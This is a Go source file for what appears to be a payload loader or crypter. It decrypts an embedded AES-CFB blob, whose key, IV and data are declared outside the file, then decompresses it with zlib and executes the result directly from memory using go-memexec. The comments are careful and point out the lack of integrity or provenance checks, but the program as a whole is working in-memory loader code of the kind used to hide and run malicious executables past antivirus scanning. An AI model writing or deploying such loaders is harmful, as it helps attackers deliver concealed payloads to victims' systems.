package main
import (
"bytes"
"compress/zlib"
"crypto/aes"
"crypto/cipher"
"fmt"
"github.com/amenzhinsky/go-memexec"
"io/ioutil"
)
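// decompress inflates a zlib stream and returns the decompressed bytes.
//
// It returns nil when input is not a valid zlib stream or when reading the
// stream fails (including a truncated stream or a checksum mismatch reported
// by the zlib reader); the error is printed to stdout.
//
// The expanded size is not bounded: ioutil.ReadAll buffers the whole result in
// memory, so a small input can expand to a very large allocation.
func decompress(input []byte) []byte {
	r, err := zlib.NewReader(bytes.NewReader(input))
	if err != nil {
		fmt.Println("[-] zlib.NewReader() Error: ", err)
		// r is nil on error; reading from it would panic.
		return nil
	}
	defer r.Close()

	out, err := ioutil.ReadAll(r)
	if err != nil {
		fmt.Println("[-] ioutil.ReadAll() Error: ", err)
		// Do not hand a truncated or corrupt buffer back to the caller.
		return nil
	}
	return out
}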
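// decrypt decrypts the package-level data blob with AES in CFB mode, using the
// package-level key and iv (all three are declared outside this file), and
// returns the plaintext.
//
// It returns nil, after printing the reason to stdout, when the key is not a
// valid AES key or when iv is not exactly one cipher block long.
//
// CFB provides confidentiality only: nothing here authenticates the
// ciphertext, so a modified blob decrypts to modified plaintext without any
// error being raised at this stage.
func decrypt() []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		fmt.Println("[-] aes.NewCipher() Error: ", err)
		// block is nil on error; building a stream from it would panic.
		return nil
	}

	// cipher.NewCFBDecrypter panics when the IV length differs from the
	// block size, so check it up front and fail cleanly instead.
	if len(iv) != block.BlockSize() {
		fmt.Println("[-] cipher.NewCFBDecrypter() Error: ", "IV length must equal block size")
		return nil
	}

	plaintext := make([]byte, len(data))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(plaintext, data)
	return plaintext
}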
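// execute runs execfile as a program through go-memexec and prints the
// program's combined stdout and stderr.
//
// Nothing is run when execfile is empty or when memexec.New fails; the reason
// is printed to stdout instead.
//
// NOTE(review): execfile is executed as-is. No hash, signature or other
// provenance check is applied to the bytes before they are run.
func execute(execfile []byte) {
	if len(execfile) == 0 {
		fmt.Println("[-] execute() Error: ", "empty executable image")
		return
	}

	exe, err := memexec.New(execfile)
	if err != nil {
		fmt.Println("[-] memexec.New() Error: ", err)
		// exe is not usable on error; calling Close or Command on it
		// would dereference nil.
		return
	}
	defer exe.Close()

	out, err := exe.Command().CombinedOutput()
	if err != nil {
		fmt.Println("[-] r.CombinedOutput() Error: ", err)
	} else {
		fmt.Println("[+] Executable ran")
	}

	// Printed in both cases: a failed run may still have produced output.
	fmt.Println(string(out))
}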
// main chains the three stages: decrypt the embedded blob, decompress the
// result, and execute the decompressed bytes. The output of each stage is
// passed straight to the next with no intermediate validation here.
func main() {
	execute(decompress(decrypt()))
}